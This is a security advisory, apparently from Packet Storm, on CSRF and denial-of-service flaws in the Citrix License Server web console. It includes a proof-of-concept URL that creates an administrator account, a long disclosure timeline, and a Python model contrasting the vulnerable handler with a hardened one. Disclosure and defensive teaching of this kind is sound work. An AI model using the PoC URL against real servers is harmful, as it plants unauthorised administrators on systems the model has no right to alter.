Citrix License Server 11.6.1 Build 10007 CSRF

2012-03-16T00:00:00
ID PACKETSTORM:110867
Type packetstorm
Reporter Knud
Modified 2012-03-16T00:00:00

Description

nSense Vulnerability Research Security Advisory NSENSE-2012-001  
---------------------------------------------------------------  
  
Affected Vendor: Citrix  
Affected Product: Citrix License Server 11.6.1 build 10007  
Impact: DoS, CSRF  
Vendor response: New version released  
CVE: N/A  
Credit: Rune & Knud aka Smurfbuddies / nSense  
Release date: 15 Mar 2012  
Vendor link: http://support.citrix.com/article/CTX128167  
  
Technical details  
---------------------------------------------------------------  
  
The license server web management interface (lmadmin, port 8082)  
contains two vulnerabilities:  
1) A pre-authentication Denial-of-Service vulnerability: a crafted  
request to the dashboard page lets an unauthenticated attacker  
crash the license server process (lmadmin.exe).  
  
2) A Cross-Site Request Forgery vulnerability: the user creation  
function accepts all of its parameters, including the account  
type, in a plain GET request with nothing tying the request to  
the administrator's session, so an attacker can create additional  
(administrator) users in the management interface IF a logged-in  
administrator can be lured into visiting a link pointing to the  
vulnerable functionality.  
  
Timeline:  
2010-12-20 Sent an e-mail to secure@citrix.com with  
vulnerability details  
2010-12-20 Citrix acknowledged the submission and opened a case  
2011-01-31 Requested a status update  
2011-01-31 Citrix replied, stated vulnerabilities are in a  
third party component  
2011-01-31 Requested more detailed information about the patch  
schedule  
2011-02-14 Requested a status update  
2011-02-14 Citrix replied  
2011-02-16 Requested more detailed information to justify  
deadline extension  
2011-02-17 Citrix replied  
2011-02-17 Requested information about the bulletin  
2011-02-17 Citrix replied  
2011-02-23 Citrix delivered bulletin information  
2011-02-23 Requested information regarding the bulletin  
2011-02-23 Citrix replied  
2011-02-24 Supplied Citrix information about nSense disclosure  
policy  
2011-03-20 Requested information about the patch schedule  
2011-03-29 Requested a status update  
2011-03-30 Enquired whether e-mails had been received  
2011-03-30 Received an e-mail bounce 550 5.2.0 STOREDRV from  
support@citrix.com  
2011-03-31 Citrix replied  
2011-03-31 Acknowledged continuing coordination  
2011-04-19 Requested a status update  
2011-05-25 Requested a status update  
2011-06-15 Requested a status update  
2011-06-16 Citrix replied  
2011-07-17 Requested a status update  
2011-08-17 Requested a status update  
2011-08-17 Citrix replied  
2011-10-12 Requested a status update  
2011-10-21 Requested a status update  
2011-10-21 Citrix replied. Still validating patches,  
still no release date set  
2011-11-18 Requested a status update. Sent timeline to  
Citrix  
2011-12-05 Citrix replied. Targeting February 2012.  
Citrix promised to send new information if  
the planned schedule changes  
2012-02-29 February 2012 officially over. No news  
from Citrix  
2012-03-02 Citrix informed they are preparing a release  
2012-03-05 Replied and specified credit information  
2012-03-13 Citrix replied. Sent knowledge base link  
2012-03-15 Advisory released. Old nSense vulnerability  
coordination policy officially terminated.  
  
Proof-of-Concept:  
http://citrix-license-server-ip:8082/users?licenseTab=&selected=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&confirm=xsrf&accountType=admin&originalAccountType=&Create=Save  
(Administrator CSRF)  
  
http://citrix-license-server-ip:8082/dashboard?  
<something long here>=2 (pre auth DoS, crashes lmadmin.exe)  
  
Note! The lmadmin crash was _not_ analyzed in any way.  
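The following is an added example, not code from the nSense advisory nor from Citrix or the lmadmin component, and it does not touch the DoS. It models the reported user-creation handling as a small Python request handler (handle_vulnerable), puts a hardened handler beside it (handle_hardened: mutation only on a POST, same-origin check on Origin with Referer as fallback, per-session synchronizer token compared in constant time), and drives both with the advisory's PoC URL as a logged-in administrator's browser would send it. The Request and Session classes, the handler names, the attacker origin and the status strings are assumptions made for this illustration.

```python
# Added example, not from the advisory or from Citrix/lmadmin: the reported
# "create user" handling modelled beside a hardened version. Request, Session
# and the handler names are assumptions made for this illustration.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional
from urllib.parse import parse_qs, urlsplit
SERVER_ORIGIN = "http://citrix-license-server-ip:8082"
POC_URL = (SERVER_ORIGIN + "/users?licenseTab=&selected=&userName=xsrf"
           "&firstName=xsrf&lastName=xsrf&password2=xsrf&confirm=xsrf"
           "&accountType=admin&originalAccountType=&Create=Save")

@dataclass
class Session:
    """Logged-in admin; the browser sends the session cookie automatically."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))

@dataclass
class Request:
    method: str
    url: str
    headers: Dict[str, str]
    session: Optional[Session]                          # None: no cookie
    form: Dict[str, str] = field(default_factory=dict)  # POST body fields

    @property
    def params(self) -> Dict[str, str]:
        # keep_blank_values so "licenseTab=" survives, as in the PoC
        q = parse_qs(urlsplit(self.url).query, keep_blank_values=True)
        return {k: v[0] for k, v in q.items()}

def handle_vulnerable(req: Request, users: Dict[str, str]) -> str:
    """Reported behaviour: any authenticated request carrying Create=Save
    creates the user, whatever the method, Origin or token."""
    if req.session is None:
        return "401 login required"
    p = {**req.form, **req.params}
    if urlsplit(req.url).path == "/users" and p.get("Create") == "Save":
        users[p["userName"]] = p.get("accountType", "user")
        return "201 created"
    return "200 ok"

def same_origin(req: Request) -> bool:
    """Origin header first, Referer as fallback; neither present: reject."""
    origin = req.headers.get("Origin")
    if origin is None and "Referer" in req.headers:
        s = urlsplit(req.headers["Referer"])
        origin = f"{s.scheme}://{s.netloc}"
    return origin == SERVER_ORIGIN

def handle_hardened(req: Request, users: Dict[str, str]) -> str:
    """Mutate only on a same-origin POST carrying the session's token."""
    if req.session is None:
        return "401 login required"
    if urlsplit(req.url).path != "/users":
        return "200 ok"
    if req.params.get("Create") == "Save":
        return "405 method not allowed"          # never mutate on a GET
    if req.method == "POST" and req.form.get("Create") == "Save":
        if not same_origin(req):
            return "403 cross-site request"
        supplied = req.form.get("csrf_token", "").encode()
        if not hmac.compare_digest(supplied, req.session.csrf_token.encode()):
            return "403 bad csrf token"
        users[req.form["userName"]] = req.form.get("accountType", "user")
        return "201 created"
    return "200 ok"

def attempt(handler, method, url, headers, form=None, with_token=False,
            new_user="xsrf"):
    """Issue one request as the logged-in admin; return (status, created?)."""
    admin, users = Session("admin"), {"admin": "admin"}
    form = dict(form or {})
    if with_token:                    # only the admin's own page has it
        form["csrf_token"] = admin.csrf_token
    status = handler(Request(method, url, headers, admin, form), users)
    return status, new_user in users

def csrf_get(handler):   # the advisory's lure: admin's browser follows POC_URL
    return attempt(handler, "GET", POC_URL,
                   {"Referer": "http://attacker.example/lure.html"})

def csrf_post(handler):  # same attack as an auto-submitted cross-site form
    return attempt(handler, "POST", SERVER_ORIGIN + "/users",
                   {"Origin": "http://attacker.example"},
                   {"userName": "xsrf", "accountType": "admin", "Create": "Save"})

def legitimate_post(handler):  # the admin's own form, token included
    return attempt(handler, "POST", SERVER_ORIGIN + "/users",
                   {"Origin": SERVER_ORIGIN},
                   {"userName": "alice", "accountType": "user", "Create": "Save"},
                   with_token=True, new_user="alice")

if __name__ == "__main__":
    for h in (handle_vulnerable, handle_hardened):
        print(h.__name__, csrf_get(h), csrf_post(h), legitimate_post(h))
```

Running the file prints, for each handler, the outcome of the GET lure from the PoC, the same attack delivered as a cross-site POST form, and the administrator's own submission; only the hardened handler refuses the first two. The Origin/Referer check is defence in depth, since browsers and proxies may strip Referer; it is the per-session token, which a cross-site page cannot read, that actually binds the request to the administrator.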
  
Additional information  
----------------------  
As our current vulnerability coordination policy has come to  
an end, we wanted to share with you some of the lap times from  
vendors who have gone through our test track.  
  
Vendor with a reasonably-priced vulnerability  
  
Leaderboard  
-----------  
VeryPDF: 1 week  
Nullsoft: 2 weeks  
Adobe: 2 months  
Cisco: 2.5 months  
SAP: 2.5 months  
Adobe: 3 months  
Teamspeak: 3 months / no patch (CERT-FI)  
Azeotech: 3.5 months (ICS-CERT)  
Angelina Jolie*: 5 months (ICS-CERT)  
Apple: 6 months  
Novell: 8 months  
Citrix: 15 months  
* Bill Bailey, or was it Scadatec?  
  
And on this bombshell, it is time to end. Good night!  
---------------------------------------------------------------  
http://www.nsense.dk http://www.nsense.fi http://www.nsense.pl  
  